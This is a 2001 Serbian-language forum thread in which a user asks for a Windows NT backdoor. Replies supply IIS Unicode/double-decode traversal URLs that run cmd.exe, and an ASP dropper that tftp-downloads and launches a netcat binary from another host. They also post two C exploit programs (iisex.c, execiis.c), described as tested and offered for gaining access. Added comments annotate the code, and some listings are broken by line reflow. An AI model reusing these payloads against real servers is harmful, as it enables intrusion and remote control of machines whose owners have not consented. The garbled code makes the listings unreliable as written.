[ sv3ta @ 10.05.2001. 01:32 ] @
Hello
Treba mi neki (bilo kakav samo da sljaka) backdoor za win NT 4/5 ...

imam i jedno pitanje ... kad sam u command line-u, kako da fetchem file sa nekog drugog servera ? preko ftp-a ne moze, postoji li neka druga komanda ?

BTW. Mrzim NT !!!!!!!!!!!!!!!!

[ sv3ta @ 10.05.2001. 02:03 ] @
Vidim da NT ima i rcp ;)

kako ide komanda za rcp ??
example :
rcp -b 123.123.123.123 .user:blah /dir/to/file.exe ??
[ etaoin @ 10.05.2001. 08:49 ] @
šta bi ti bio backdoor?

uvek ima način da uđeš ako znaš odgovarajući pass. samo još treba da ga saznaš.

1. l0phtcrack uz NTFSDOS ili neki sniffer
2. passware windows 2000/NT key
3. neki sniffer
4. da pritegneš administratora
5. da mu stojiš iza ramena dok ovaj polako ukucava pass
6. da vidiš oko monitora da nije negde zapisan
[ m r v a @ 08.06.2001. 10:44 ] @
Citat:
sv3ta je napisao:
Hello
Treba mi neki (bilo kakav samo da sljaka) backdoor za win NT 4/5 ...


koliko god to izgledalo lame ....
al' NEtBus radi na NT4 ......
[ stinger @ 08.06.2001. 13:59 ] @
sveto probaj sa ovim igrackama :

NT 4.0 + IIS 3.0 + SP6a

http://www.example.com/scripts....%252f..%252fwinnt/system32/cm
d.exe?/c+dir+c:\



----



http://192.168.0.1/msadc/..%25....%255c../winnt/system32/cmd.ex
e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp

then i ran http://192.168.0.1/f.asp

following is a copy of the f.asp:


----------cut here-------------------------
<%
' Forensic description of the dropper page as pasted in the thread. Two lines
' (the tftp WriteLine and the final Response.Write) are broken across lines by
' the forum reflow, so the listing is not valid VBScript exactly as shown.
'
' Step 1: enumerate drives and remember the ready, non-A: drive with the most
' free space: letter in dmax, type in dmab, total size in dmaa, serial in dmad,
' free space in dmac.
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
' Step 2: write dl.bat next to this page (server.mappath resolves it under the
' web root). Artifacts a responder can look for: dl.bat in the scripts
' directory, nc0.exe, and TFTP* temporary files under \Inetpub\scripts, plus
' outbound tftp traffic to 192.168.1.33 from the web server.
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
' The batch file loops on the download until the file exists, starts the
' fetched binary, then removes the tftp leftovers.
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
' Step 3: run dl.bat with the chosen drive letter as its only argument, in the
' security context of the IIS worker process.
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
' Step 4: on failure the batch file is deleted (self-cleanup, so its absence
' does not prove the page never ran); on success the drive details are echoed
' in the HTTP response, "|" prefixed and "*" separated.
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>



---------



http://www.knelo.com/~aramos/perl/iisrules.tgz

$ gzip -dc iisrules.tgz | tar -xvf -
iisrules.exe
iisrules.pl



----------


^^^--------- iisex.c starts here-------^^^^

/* IISEX by HuXfLuX <[email protected]>. IIS CGI File Decode Bug
exploit. Written 16-05-2001.
Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's
products were always
famous for their backward compatibility!

You can change the SHOWSEQUENCE value to some other strings that also
work.
More info: http://www.nsfocus.com

Thanx to Filip Maertens <[email protected]>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

/*
 * Entry point of iisex.c as pasted in the thread.
 *
 * Resolves argv[1], connects to TCP port 80, sends one HTTP/1.0 GET whose
 * path is SHOWSEQUENCE followed by argv[2], and echoes the reply byte by
 * byte. Exits 0 on too few arguments, -1 on resolver failure, 1 on a
 * failed connect().
 *
 * Detection note: the request line carries the literal double-encoded
 * traversal "/scripts/.%252e/.%252e/winnt/system32/cmd.exe" (SHOWSEQUENCE),
 * so the IIS access log and any HTTP inspection see that string verbatim.
 * The last reply in the thread notes the vendor patch/service pack closes
 * the decode bug.
 */
int main(int argc, char *argv[])
{

struct sockaddr_in sin;
struct in_addr victim;
/* recvbuffer is a single byte; stuff holds the request and starts empty so
 * the strcat() calls below append to "". strcat() has no length check, so
 * "GET " + SHOWSEQUENCE + argv[2] + " HTTP/1.0\r\n\r\n" must fit in 200
 * bytes or this stack buffer overflows. */
char recvbuffer[1], stuff[200]="";
int create_socket;

/* The banner string literal is broken across three lines by the forum
 * reflow; it does not compile exactly as shown. */
printf("IISEX by HuxFlux <[email protected]>\nThis exploits
the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and
5!.\n");

if (argc < 3)
{
printf("[?] Usage: %s [ip] [command]\n", argv[0]);
exit(0);
}

if (!resolv(argv[1],&victim))
{
printf("[x] Error resolving host.\n");
exit(-1);
}
printf("\n[S] Exploit procedure beginning.\n");

/* A failed socket() (-1) only skips the message; execution continues with
 * the invalid descriptor and connect() below then fails. */
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf("[*] Socket created.\n");

/* bzero() is the legacy BSD spelling of memset(&sin, 0, sizeof sin). */
bzero(&sin,sizeof(sin));
memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
/* Leftover from the inet_addr()-only variant; resolv() replaced it. */
//sin.sin_addr.s_addr = inet_addr(argv[1]);


if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf("[*] Connection made.\n");
else {
printf("[x] No connection.\n");
exit(1);
}

strcat(stuff, "GET ");
strcat(stuff, SHOWSEQUENCE);
strcat(stuff, argv[2]);
strcat(stuff, " HTTP/1.0\r\n\r\n");
printf("[*] Sending: %s", stuff);

/* Clears the one-byte receive buffer; nothing has been received yet. */
memset(recvbuffer, '\0',sizeof(recvbuffer));

/* Sends the whole 200-byte array, i.e. the request text plus its trailing
 * NUL padding, instead of strlen(stuff) bytes. Return value unchecked. */
send(create_socket, stuff, sizeof(stuff), 0);

/* recvbuffer still holds only the '\0' from memset(), so strstr() always
 * returns NULL and this branch is always taken; the "Wrong command
 * processing" branch below is effectively unreachable. */
if ( strstr(recvbuffer,"404") == NULL ) {
printf("[*] Command output:\n\n");

/* One byte per recv() until the peer closes the connection. */
while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}
printf("\n\n");
}
else printf("[x] Wrong command processing. \n");
printf("[E] Finished.\n");

/* main() falls off the end without a return; C99 treats that as return 0. */
close(create_socket);
}

/*
 * resolv - fill *addr with the IPv4 address for hostname.
 *
 * A dotted-quad literal is converted directly with inet_aton(); any other
 * string goes through gethostbyname() and the first address of the result
 * is copied. gethostbyname() is obsolete in POSIX (getaddrinfo() replaces
 * it) and is kept here only to preserve the original behaviour.
 *
 * Returns 1 on success, 0 when the name cannot be resolved.
 */
int resolv(char *hostname,struct in_addr *addr)
{
	/* Literal address: no lookup needed. */
	if (inet_aton(hostname, addr) != 0) {
		return 1;
	}

	struct hostent *he = gethostbyname(hostname);
	if (he == NULL) {
		return 0;
	}

	/* h_addr_list[0] is the first address of the entry; copy one in_addr. */
	memcpy(addr, he->h_addr_list[0], sizeof *addr);
	return 1;
}
^^^--------- iisex.c ends here-------^^^^



ako ti jos ovakvih bude trebalo javi... svi su na istu semu ... u principu svi rade, testirali smo ih ovde na drenik-u .. :)
[ stinger @ 08.06.2001. 14:00 ] @
evo i ovaj... :)



/*
*
* execiis.c - (c)copyright Filip Maertens
* BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
*
* DISCLAIMER: This is proof of concept code. This means, this
code
* may only be used on approved systems in order to test the
availability
* and integrity of machines during a legal penetration test. In no
way
* is the author of this exploit responsible for the use and result
of
* this code.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>


/* Modify this value to whichever sequence you want.
*
* %255c = %%35c = %%35%63 = %25%35%63 = /
*
*/

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"



/*
 * Entry point of execiis.c as pasted in the thread.
 *
 * Same structure as the previous listing: connect to argv[1]:80, send one
 * HTTP/1.0 GET whose path is SHOWSEQUENCE followed by argv[2], echo the
 * reply. The traversal string "/scripts/..%255c..%255cwinnt/system32/cmd.exe"
 * appears verbatim in the request line and therefore in the IIS access log.
 *
 * As shown, this listing does not compile: the if at the "404" check has a
 * single-statement body, the while loop is a separate statement, and the
 * following else has no matching if. inet_addr() is also used without
 * <arpa/inet.h>, so it is implicitly declared.
 */
int main(int argc, char *argv[])
{

/* sin is never zeroed (sin_zero left indeterminate). stuff is NOT
 * initialised, yet strcat() below appends to it, so the request is built
 * after whatever bytes happen to be on the stack: undefined behaviour. */
struct sockaddr_in sin;
char recvbuffer[1], stuff[200];
int create_socket;

/* The banner string literal is broken across two lines by the forum
 * reflow; it does not compile exactly as shown. */
printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |
<[email protected]>\n-------------------------------------------------------------------------\n");

if (argc < 3)
{
printf(" -- Usage: iisexec [ip] [command]\n");
exit(0);
}


/* A failed socket() (-1) only skips the message; connect() below then
 * fails on the invalid descriptor. */
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");

sin.sin_family = AF_INET;
sin.sin_port = htons(80);
/* inet_addr() returns INADDR_NONE for a malformed argv[1]; not checked. */
sin.sin_addr.s_addr = inet_addr(argv[1]);

if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{ printf(" -- No connection.\n"); exit(1); }


/* No length check: the combined request must fit in 200 bytes. The request
 * ends with bare LF pairs rather than the CRLF of the HTTP grammar. */
strcat(stuff, "GET ");
strcat(stuff, SHOWSEQUENCE);
strcat(stuff, argv[2]);
strcat(stuff, " HTTP/1.0\n\n");

memset(recvbuffer, '\0',sizeof(recvbuffer));

/* Sends all 200 bytes of the array, not strlen(stuff); return unchecked. */
send(create_socket, stuff, sizeof(stuff), 0);
/* Reads exactly one byte of the reply into the 1-byte buffer. After this
 * there is no NUL terminator, so the strstr() below reads past the end of
 * recvbuffer (out-of-bounds stack read); it can never match a 3-char "404". */
recv(create_socket, recvbuffer, sizeof (recvbuffer),0);



if ( ( strstr(recvbuffer,"404") == NULL ) )

printf(" -- Command output:\n\n");
/* Not part of the if above (no braces); the else that follows is orphaned. */
while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}

else
printf(" -- Wrong command processing. \n");

/* main() falls off the end without a return; C99 treats that as return 0. */
close(create_socket);

}

[ stinger @ 08.06.2001. 14:00 ] @
nisu backdoor-ovi ali ti daju access na masinu svaki put kad ti zatreba ... :)
[ m r v a @ 08.06.2001. 19:55 ] @
samo jedno pitanjce .....jel' su isprobani ovi trickovi ???
[ stinger @ 10.06.2001. 13:03 ] @
naravno.. ako zelis log.. mogu da ti posaljem, inace radi na 70% NT-a u svetu ... naravno sad je vecina zakrpljena.. ali uvek se nadje.. :) ako zelis log ko sto rekoh... nije problem :)
[ Shadowed @ 08.09.2005. 18:21 ] @
Inace, Unicode bug se neutralise instaliranjem odgovarajuceg patch-a ili SP-a.
(cisto da usaglasim temu sa pravilnikom).